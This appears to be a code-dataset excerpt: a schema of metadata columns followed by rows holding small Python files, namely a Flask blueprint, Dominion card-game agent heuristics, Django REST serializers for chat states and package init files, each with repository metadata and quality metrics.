hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
d439ffdbf06785b49342634199820579ecf19f5f
102
py
Python
app/routes/__init__.py
abcnever/euchre-game
5446e345e0dfdcf83d5fe87c3d2cedc31b3ae669
[ "MIT" ]
1
2018-12-31T05:38:56.000Z
2018-12-31T05:38:56.000Z
app/routes/__init__.py
abcnever/euchre-game
5446e345e0dfdcf83d5fe87c3d2cedc31b3ae669
[ "MIT" ]
4
2018-11-03T15:51:13.000Z
2019-01-12T21:09:23.000Z
app/routes/__init__.py
abcnever/euchre-game
5446e345e0dfdcf83d5fe87c3d2cedc31b3ae669
[ "MIT" ]
null
null
null
from flask import Blueprint routes = Blueprint('routes', __name__) from . import index import rooms
14.571429
38
0.77451
13
102
5.769231
0.615385
0.4
0
0
0
0
0
0
0
0
0
0
0.156863
102
6
39
17
0.872093
0
0
0
0
0
0.058824
0
0
0
0
0
0
1
0
false
0
0.75
0
0.75
0.5
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
2e03f35b0822759a335c0fe0661869bd17581090
19,035
py
Python
domrl/agents/my_agents.py
santiagonasar/DomRL
00ce010ea2d5d3cb1b56910f2304c114d82d3198
[ "MIT" ]
null
null
null
domrl/agents/my_agents.py
santiagonasar/DomRL
00ce010ea2d5d3cb1b56910f2304c114d82d3198
[ "MIT" ]
null
null
null
domrl/agents/my_agents.py
santiagonasar/DomRL
00ce010ea2d5d3cb1b56910f2304c114d82d3198
[ "MIT" ]
null
null
null
import string import numpy import copy from domrl.engine.agent import Agent """ class Agent(object): def choose(self, decision, state): return decision.moves[0] class StdinAgent(Agent): def choose(self, decision, state): # Autoplay if len(decision.moves) == 1: return [0] player = decision.player print(f" ==== Decision to be made by {player} ==== ") print(f"Actions: {player.actions} | Buys: {player.buys} | Coins: {player.coins}") print("Hand: ", list(map(str, player.hand))) print(decision.prompt) for idx, move in enumerate(decision.moves): print(f"{idx}: {move}") # Get user input and process it. while True: user_input = input() if user_input == "?": state.event_log.print(player) print(state) else: try: ans = list(map(lambda x: int(x.strip()), user_input.split(','))) except: print('Clearly invalid input. Please try again.') continue break return ans class APIAgent(Agent): def choose(self, decision, state): # Autoplay # if len(decision.moves) == 1: # return [0] player = decision.player actions = player.actions buys = player.buys coins = player.coins moves = decision.moves hand = player.hand state while True: user_input = input() if user_input == "?": state.event_log.print(player) print(state) else: ans = list(map(lambda x: int(x.strip()), user_input.split(','))) break return ans """ class RandomAgent(Agent): def policy(self, decision, state): if 'Trash up to 4' in decision.prompt: # for chapel my_list = [] range_max = numpy.random.randint(0, min(len(decision.moves), 4) + 1, 1, int) for idx in range(0, range_max[0]): new_item = -1 while new_item == -1 or new_item in my_list: new_item = numpy.random.randint(0, len(decision.moves), 1, int)[0] my_list.append(new_item) return my_list if len(decision.moves) == 0: return [] if 'Discard down to 3 cards' in decision.prompt: # for militia my_list = [] range_max = max(len(decision.player.hand) - 3, 0) for idx in range(0, range_max): new_item = -1 while new_item == -1 or new_item in my_list: new_item = numpy.random.randint(0, len(decision.moves), 1, int)[0] my_list.append(new_item) return my_list value = list(numpy.random.randint(0, len(decision.moves), 1, int)) return value class PassOnBuySemiAgent(Agent): def policy(self, decision, state): if 'Buy' in decision.prompt: return [0] class CleverAgentOld(Agent): def __init__(self, agent): self.agent = agent def policy(self, decision, state): initialDecision = copy.deepcopy(decision) # Automove If One Move if len(decision.moves) == 1: return [0] for idx in range(0, len(initialDecision.moves)): move = initialDecision.moves[idx] if "Buy: Curse" in move.__str__(): decision.moves.pop(idx) if hasattr(move, "card") and ( move.card.add_actions > 0 or ("treasure" in decision.prompt.lower() and move.card.coins > 0)): return self.restrictDecision(decision.moves, initialDecision.moves, idx) restrictedChoice = self.agent.policy(decision, state) return self.restrictDecision(decision.moves, initialDecision.moves, restrictedChoice[0]) def restrictDecision(self, moves, initialMoves, chosen): for idx in range(0, len(initialMoves)): if str(initialMoves[idx]) == str(moves[chosen]): return list([idx]) return [chosen] class RulesSemiAgent(Agent): def policy(self, decision, state): # Automove If One Move if len(decision.moves) == 1: return [0] for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if "Bandit" in str(move): # currently does not work decision.moves.pop(idx) if "Remodel" in str(move): # currently does not work decision.moves.pop(idx) class CleverSemiAgent(Agent): def policy(self, decision, state): # Automove If One Move if len(decision.moves) == 1: return [0] for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if "Buy: Curse" in move.__str__(): decision.moves.pop(idx) if hasattr(move, "card") and ( move.card.add_actions > 0 or ("treasure" in decision.prompt.lower() and move.card.coins > 0)): return [idx] class ApplySemiAgent(Agent): def __init__(self, semiAgents, agent): self.semiAgents = semiAgents self.agent = agent def policy(self, decision, state): for semiAgent in self.semiAgents: value = semiAgent.policy(decision, state) if value is not None: return value return self.agent.policy(decision, state) class BigMoneySemiAgent(Agent): def policy(self, decision, state): for stringDesired in ["Buy: Province", "Buy: Gold", "Buy: Silver"]: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if stringDesired in move.__str__(): return [idx] class SmithySemiAgent(Agent): def policy(self, decision, state): for stringDesired in ["Play: Smithy"]: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if stringDesired in move.__str__(): return [idx] for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if "Buy: Smithy" in move.__str__() and ( sum(1 for c in decision.player.all_cards if 'Smithy' in str(c)) / len( decision.player.all_cards) < 0.1): return [idx] class DontBuyCopperOrEstateSemiAgent(Agent): def policy(self, decision, state): for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if 'Buy: Copper' in str(move) or 'Buy: Estate' in str(move): decision.moves.pop(idx) class MyHeuristicSemiAgent(Agent): def policy(self, decision, state): for stringDesired in []: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if stringDesired in move.__str__(): return [idx] if 'Action' in decision.prompt: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if 'Militia' in str(move) or 'Smithy' in str(move): return [idx] if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt: return desired_deck = {'Festival': 1, 'Market': 1, 'Militia': 1, 'Smithy': 0.1, 'Village': 0.2} if numpy.random.randint(0, 2, 1, int) == 1: desired_deck = {'Market': 1, 'Festival': 1, 'Smithy': 0.1, 'Militia': 1, 'Village': 0.2} for wish in desired_deck: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if wish in str(move) and ( sum(1 for c in decision.player.all_cards if wish in str(c)) / len( decision.player.all_cards) < desired_deck[wish]): return [idx] class MarketSemiAgent(Agent): def policy(self, decision, state): if 'Action' in decision.prompt: for stringDesired in ['Empty']: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if 'Militia' in str(move): return [idx] if 'Smithy' in str(move) and decision.player.actions > 1: return [idx] if stringDesired in str(move): return [idx] if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt: return desired_deck = {'Market': 1, 'Militia': 0.001, 'Smithy': 0.001, 'Village': 0.2} for wish in desired_deck: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if wish in str(move): if sum(1 for c in decision.player.all_cards if wish in str(c)) / len( decision.player.all_cards) < desired_deck[wish]: return [idx] class CustomHeuristicsSemiAgent(Agent): def __init__(self, desired_decks): self.desired_deck = desired_decks def policy(self, decision, state): if 'Action' in decision.prompt: for stringDesired in ['Empty']: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if 'Militia' in str(move): return [idx] if 'Smithy' in str(move) and decision.player.actions > 1: return [idx] if stringDesired in str(move): return [idx] if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt: return for wish in self.desired_deck: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if wish in str(move): if sum(1 for c in decision.player.all_cards if wish in str(c)) / len( decision.player.all_cards) < self.desired_deck[wish]: return [idx] class MarketNoSmithySemiAgent(Agent): def policy(self, decision, state): if 'Action' in decision.prompt: for stringDesired in ['Empty']: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if 'Militia' in str(move): return [idx] if 'Smithy' in str(move) and decision.player.actions > 1: return [idx] if stringDesired in str(move): return [idx] if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt: return desired_deck = {'Market': 1, 'Militia': 0.1, 'Village': 0.2} for wish in desired_deck: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if wish in str(move): if sum(1 for c in decision.player.all_cards if wish in str(c)) / len( decision.player.all_cards) < desired_deck[wish]: return [idx] class MarketNoSmithySemiAgent2(Agent): def policy(self, decision, state): if 'Action' in decision.prompt: for stringDesired in ['Empty']: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if 'Militia' in str(move): return [idx] if 'Smithy' in str(move) and decision.player.actions > 1: return [idx] if stringDesired in str(move): return [idx] if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt: return desired_deck = {'Market': 1, 'Militia': 0.2, 'Village': 0.2} for wish in desired_deck: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if wish in str(move): if sum(1 for c in decision.player.all_cards if wish in str(c)) / len( decision.player.all_cards) < desired_deck[wish]: return [idx] class OnlyBuyCopperIfSemiAgent(Agent): def policy(self, decision, state): for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if "Buy: Copper" in str(move): if sum(c.coins for c in decision.player.all_cards) < 5: return [idx] else: decision.moves.pop(idx) class ChapelSemiAgent(Agent): def policy(self, decision, state): if 'Action' in decision.prompt: for c in decision.player.hand: if 'Estate' in str(c): for idx in range(0, len(decision.moves)): if 'Play: Chapel' in str(decision.moves[idx]): return [idx] if 'Trash up to 4' in decision.prompt: moves = [] for idx in range(0, len(decision.moves)): if len(moves) >= 4: break try: move = decision.moves[idx] except: break if "Choose: Estate" in move.__str__(): moves.append(idx) for idx in range(0, len(decision.moves)): if len(moves) >= 4: break try: move = decision.moves[idx] except: break if "Choose: Copper" in move.__str__() and ( sum(c.coins for c in decision.player.all_cards) - sum(1 for planned_move in moves if 'Copper' in str(planned_move)) > 5): moves.append(idx) return moves if 'Buy' in decision.prompt: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if 'Buy: Chapel' in str(move) and decision.player.coins < 4 and ( sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) == 0): return [idx] class AggressiveChapelSemiAgent(ChapelSemiAgent): def policy(self, decision, state): if 'Action' in decision.prompt: for c in decision.player.hand: if 'Estate' in str(c) or ('Copper' in str(c) and sum(c.coins for c in decision.player.all_cards) > 5): for idx in range(0, len(decision.moves)): if 'Play: Chapel' in str(decision.moves[idx]): return [idx] if 'Trash' in decision.prompt: moves = [] for idx in range(0, len(decision.moves)): if len(moves) >= 4: break try: move = decision.moves[idx] except: break if "Choose: Estate" in str(move): moves.append(idx) for idx in range(0, len(decision.moves)): if len(moves) >= 4: break try: move = decision.moves[idx] except: break if "Choose: Copper" in str(move) and ( sum(c.coins for c in decision.player.all_cards) - sum(1 for planned_move in moves if 'Copper' in str(decision.moves[planned_move])) > 5): moves.append(idx) return moves for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if "Buy: Chapel" in str(move) and (sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) > 0): decision.moves.pop(idx) if "Buy: Chapel" in str(move) and decision.player.coins < 4 and ( sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) == 0): return [idx] class ProvinceSemiAgent(Agent): def policy(self, decision, state): for stringDesired in ["Buy: Province"]: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if stringDesired in move.__str__(): return [idx] class ProvinceNeverLoseSemiAgent(Agent): def policy(self, decision, state): desired_strings = ["Buy: Province"] if (state.supply_piles['Province'].qty == 1 and (6 + decision.player.total_vp() < max(state.other_players, key=lambda pr: pr.total_vp()).total_vp())): desired_strings = ["Buy: Duchy"] for stringDesired in desired_strings: for idx in range(0, len(decision.moves)): try: move = decision.moves[idx] except: break if stringDesired in str(move): return [idx]
32.262712
118
0.492094
2,095
19,035
4.409547
0.083532
0.111171
0.065815
0.045031
0.790431
0.767049
0.75774
0.731868
0.708811
0.682615
0
0.012843
0.41098
19,035
589
119
32.317487
0.811095
0.006987
0
0.760204
0
0
0.049746
0
0
0
0
0
0
1
0.058673
false
0.002551
0.010204
0
0.247449
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2e0969f7a34ab55314e5540bfd52964a79256105
7,452
py
Python
permabots/serializers/state.py
eafanasev/permabots
24de0376e8c482800f4214c021c133d81b9de69f
[ "BSD-3-Clause" ]
81
2016-05-18T02:34:10.000Z
2021-08-28T17:25:13.000Z
permabots/serializers/state.py
eafanasev/permabots
24de0376e8c482800f4214c021c133d81b9de69f
[ "BSD-3-Clause" ]
15
2016-05-27T08:51:46.000Z
2021-03-19T21:42:21.000Z
permabots/serializers/state.py
eafanasev/permabots
24de0376e8c482800f4214c021c133d81b9de69f
[ "BSD-3-Clause" ]
34
2016-05-29T14:37:01.000Z
2022-03-24T17:16:53.000Z
from rest_framework import serializers from permabots.models import State, TelegramChatState, TelegramChat, TelegramUser, KikChatState, KikChat, KikUser, MessengerChatState from django.utils.translation import ugettext_lazy as _ class StateSerializer(serializers.HyperlinkedModelSerializer): id = serializers.ReadOnlyField(help_text=_("State ID")) class Meta: model = State fields = ['id', 'created_at', 'updated_at', 'name'] read_only_fields = ('id', 'created_at', 'updated_at',) class TelegramChatStateSerializer(serializers.ModelSerializer): id = serializers.ReadOnlyField(help_text=_("Chat State ID")) chat = serializers.IntegerField(source="chat.id", help_text=_("Chat identifier. Telegram API format. https://core.telegram.org/bots/api#chat")) state = StateSerializer(many=False, help_text=_("State associated to the Chat")) user = serializers.IntegerField(source="user.id", help_text=_("User indentifier. Telegram API format. https://core.telegram.org/bots/api#chat")) class Meta: model = TelegramChatState fields = ['id', 'created_at', 'updated_at', 'chat', 'user', 'state'] read_only_fields = ('id', 'created_at', 'updated_at',) def create(self, validated_data): chat = TelegramChat.objects.get(pk=validated_data['chat']) user = TelegramUser.objects.get(pk=validated_data['user']) state = State.objects.get(name=validated_data['state']['name']) chat_state = TelegramChatState.objects.create(chat=chat, state=state, user=user) return chat_state def update(self, instance, validated_data): chat = TelegramChat.objects.get(pk=validated_data['chat']['id']) user = TelegramUser.objects.get(pk=validated_data['user']['id']) state = State.objects.get(name=validated_data['state']['name']) instance.chat = chat instance.user = user instance.state = state instance.save() return instance class TelegramChatStateUpdateSerializer(TelegramChatStateSerializer): chat = serializers.IntegerField(source="chat.id", required=False, help_text=_("Chat identifier. Telegram API format. https://core.telegram.org/bots/api#chat")) state = StateSerializer(many=False, required=False, help_text=_("State associated to the Chat")) user = serializers.IntegerField(source="user.id", required=False, help_text=_("User identifier. Telegram API format. https://core.telegram.org/bots/api#chat")) def update(self, instance, validated_data): if 'user' in validated_data: instance.user = TelegramUser.objects.get(pk=validated_data['user']['id']) if 'chat' in validated_data: instance.chat = TelegramChat.objects.get(pk=validated_data['chat']['id']) if 'state' in validated_data: instance.state = State.objects.get(name=validated_data['state']['name']) instance.save() return instance class KikChatStateSerializer(serializers.ModelSerializer): id = serializers.ReadOnlyField(help_text=_("Chat State ID")) chat = serializers.CharField(source="chat.id", help_text=_("Chat identifier. Kik API format.")) state = StateSerializer(many=False, help_text=_("State associated to the Chat")) user = serializers.CharField(source="user.username", help_text=_("User indentifier. Kik API format")) class Meta: model = KikChatState fields = ['id', 'created_at', 'updated_at', 'chat', 'user', 'state'] read_only_fields = ('id', 'created_at', 'updated_at',) def create(self, validated_data): chat = KikChat.objects.get(pk=validated_data['chat']) user = KikUser.objects.get(pk=validated_data['user']) state = State.objects.get(name=validated_data['state']['name']) chat_state = KikChatState.objects.create(chat=chat, state=state, user=user) return chat_state def update(self, instance, validated_data): chat = KikChat.objects.get(pk=validated_data['chat']['id']) user = KikUser.objects.get(pk=validated_data['user']['username']) state = State.objects.get(name=validated_data['state']['name']) instance.chat = chat instance.user = user instance.state = state instance.save() return instance class KikChatStateUpdateSerializer(KikChatStateSerializer): chat = serializers.CharField(source="chat.id", required=False, help_text=_("Chat identifier. Kik API format.")) state = StateSerializer(many=False, required=False, help_text=_("State associated to the Chat")) user = serializers.CharField(source="user.username", required=False, help_text=_("User identifier. Kik API format.")) def update(self, instance, validated_data): if 'user' in validated_data: instance.user = KikUser.objects.get(pk=validated_data['user']['username']) if 'chat' in validated_data: instance.chat = KikChat.objects.get(pk=validated_data['chat']['id']) if 'state' in validated_data: instance.state = State.objects.get(name=validated_data['state']['name']) instance.save() return instance class MessengerChatStateSerializer(serializers.ModelSerializer): id = serializers.ReadOnlyField(help_text=_("Chat State ID")) chat = serializers.CharField(help_text=_("Chat identifier. Messenger API format.")) state = StateSerializer(many=False, help_text=_("State associated to the Chat")) class Meta: model = MessengerChatState fields = ['id', 'created_at', 'updated_at', 'chat', 'state'] read_only_fields = ('id', 'created_at', 'updated_at',) def create(self, validated_data): chat = validated_data['chat'] state = State.objects.get(name=validated_data['state']['name']) chat_state = MessengerChatState.objects.create(chat=chat, state=state) return chat_state def update(self, instance, validated_data): chat = validated_data['chat'] state = State.objects.get(name=validated_data['state']['name']) instance.chat = chat instance.state = state instance.save() return instance class MessengerChatStateUpdateSerializer(MessengerChatStateSerializer): chat = serializers.CharField(required=False, help_text=_("Chat identifier. Messenger API format.")) state = StateSerializer(many=False, required=False, help_text=_("State associated to the Chat")) def update(self, instance, validated_data): if 'chat' in validated_data: instance.chat = validated_data['chat'] if 'state' in validated_data: instance.state = State.objects.get(name=validated_data['state']['name']) instance.save() return instance
47.164557
148
0.625872
780
7,452
5.833333
0.103846
0.117143
0.056044
0.055385
0.827912
0.82044
0.778022
0.746593
0.716264
0.658462
0
0
0.255502
7,452
158
149
47.164557
0.820115
0
0
0.601626
0
0
0.163022
0
0
0
0
0
0
1
0.073171
false
0
0.02439
0
0.422764
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2e1d52600cecea1b471b062e4a225acf8590bb5b
201
py
Python
robotathome/__init__.py
goyoambrosio/RobotAtHome_API
91864b4cf06202656def6b66ac348708337a9d52
[ "MIT" ]
1
2021-02-21T09:31:25.000Z
2021-02-21T09:31:25.000Z
robotathome/__init__.py
goyoambrosio/RobotAtHome_API
91864b4cf06202656def6b66ac348708337a9d52
[ "MIT" ]
null
null
null
robotathome/__init__.py
goyoambrosio/RobotAtHome_API
91864b4cf06202656def6b66ac348708337a9d52
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- __version__ = "0.4.9" from robotathome.version import * from robotathome.helpers import * from robotathome.toolbox import * from robotathome.log import *
22.333333
33
0.731343
27
201
5.296296
0.62963
0.41958
0.440559
0
0
0
0
0
0
0
0
0.022989
0.134328
201
8
34
25.125
0.798851
0.208955
0
0
0
0
0.031847
0
0
0
0
0
0
1
0
false
0
0.8
0
0.8
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
5cf06ac7a7b0b3cfe37cd14963dd9859601b68ba
716
py
Python
dojo/__init__.py
VIVelev/PyDojo
d932b3df841636208611192be1f881390c361289
[ "MIT" ]
4
2018-10-29T22:01:39.000Z
2019-01-15T14:46:40.000Z
dojo/__init__.py
VIVelev/PyDojo
d932b3df841636208611192be1f881390c361289
[ "MIT" ]
3
2018-12-16T15:35:52.000Z
2020-03-31T01:14:53.000Z
dojo/__init__.py
VIVelev/PyDojo
d932b3df841636208611192be1f881390c361289
[ "MIT" ]
null
null
null
from . import ( anomaly, base, bayes, cluster, dimred, ensemble, evolution, linear, metrics, nlp, nn, plot, preprocessing, split, svm, tree, tuning, activations, exceptions, losses, misc, optimizers, regularizers, statistics, ) __all__ = [ "anomaly", "base", "bayes", "cluster", "dimred", "ensemble", "evolution", "linear", "metrics", "nlp", "nn", "plot", "preprocessing", "split", "svm", "tree", "tuning", "activations", "exceptions", "losses", "misc", "optimizers", "regularizers", "statistics", ] __version__ = "0.4.9"
12.785714
21
0.49581
55
716
6.309091
0.563636
0.063401
0.092219
0.132565
0.933718
0.933718
0.933718
0.933718
0.933718
0.933718
0
0.006494
0.354749
716
55
22
13.018182
0.744589
0
0
0
0
0
0.23324
0
0
0
0
0
0
1
0
false
0
0.018868
0
0.018868
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
cf15d443632a0a7ff7b603303f52089b10666d75
29
py
Python
faculty_sync/__init__.py
Matt-Haugh/faculty-sync
56bac90badfe6812f44bad13f56715e4e16f4e57
[ "Apache-2.0" ]
6
2019-02-08T10:36:07.000Z
2021-11-30T06:04:56.000Z
faculty_sync/__init__.py
Matt-Haugh/faculty-sync
56bac90badfe6812f44bad13f56715e4e16f4e57
[ "Apache-2.0" ]
32
2018-04-29T13:54:39.000Z
2019-01-18T16:14:54.000Z
faculty_sync/__init__.py
Matt-Haugh/faculty-sync
56bac90badfe6812f44bad13f56715e4e16f4e57
[ "Apache-2.0" ]
3
2020-01-09T17:03:31.000Z
2021-04-04T10:37:25.000Z
from .app import run # noqa
14.5
28
0.689655
5
29
4
1
0
0
0
0
0
0
0
0
0
0
0
0.241379
29
1
29
29
0.909091
0.137931
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cf15dd2f22f5f6ead7a60c2bea1f3a755aad40b2
180
py
Python
schema/schema.py
akarapun/elearning
fe116d5815925269819061ea183cbfdb773844cf
[ "MIT" ]
1
2020-03-14T11:00:14.000Z
2020-03-14T11:00:14.000Z
schema/schema.py
akarapun/elearning
fe116d5815925269819061ea183cbfdb773844cf
[ "MIT" ]
null
null
null
schema/schema.py
akarapun/elearning
fe116d5815925269819061ea183cbfdb773844cf
[ "MIT" ]
null
null
null
import graphene from root_query import RootQuery as query from root_mutation import RootMutation as mutation def get(): return graphene.Schema(query=query, mutation=mutation)
25.714286
58
0.816667
25
180
5.8
0.52
0.110345
0
0
0
0
0
0
0
0
0
0
0.133333
180
6
59
30
0.929487
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
true
0
0.6
0.2
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
1
1
0
0
6
cf3333692ac60d08a7e6536dccc579d614d6a1e3
25
py
Python
pimkl/models/__init__.py
PhosphorylatedRabbits/pimkl
824fe70027d7950ea6775c8db2ac587d8504ff3d
[ "MIT" ]
3
2019-10-01T10:05:53.000Z
2021-03-08T12:16:17.000Z
pimkl/models/__init__.py
PhosphorylatedRabbits/pimkl
824fe70027d7950ea6775c8db2ac587d8504ff3d
[ "MIT" ]
82
2019-10-18T16:01:26.000Z
2022-02-03T16:56:04.000Z
pimkl/models/__init__.py
PhosphorylatedRabbits/pimkl
824fe70027d7950ea6775c8db2ac587d8504ff3d
[ "MIT" ]
null
null
null
from .pimkl import PIMKL
12.5
24
0.8
4
25
5
0.75
0
0
0
0
0
0
0
0
0
0
0
0.16
25
1
25
25
0.952381
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
cf495150ff1ac19fcbe331ab5bc19db881f77aa9
14,735
py
Python
mooringlicensing/tests/test_proposal_vessel_logic.py
GraemeMuller/mooringlicensing
2b2594189fb88f4add3fbc979a60a05397aaa491
[ "Apache-2.0" ]
null
null
null
mooringlicensing/tests/test_proposal_vessel_logic.py
GraemeMuller/mooringlicensing
2b2594189fb88f4add3fbc979a60a05397aaa491
[ "Apache-2.0" ]
null
null
null
mooringlicensing/tests/test_proposal_vessel_logic.py
GraemeMuller/mooringlicensing
2b2594189fb88f4add3fbc979a60a05397aaa491
[ "Apache-2.0" ]
15
2021-03-02T01:40:12.000Z
2022-02-15T08:26:09.000Z
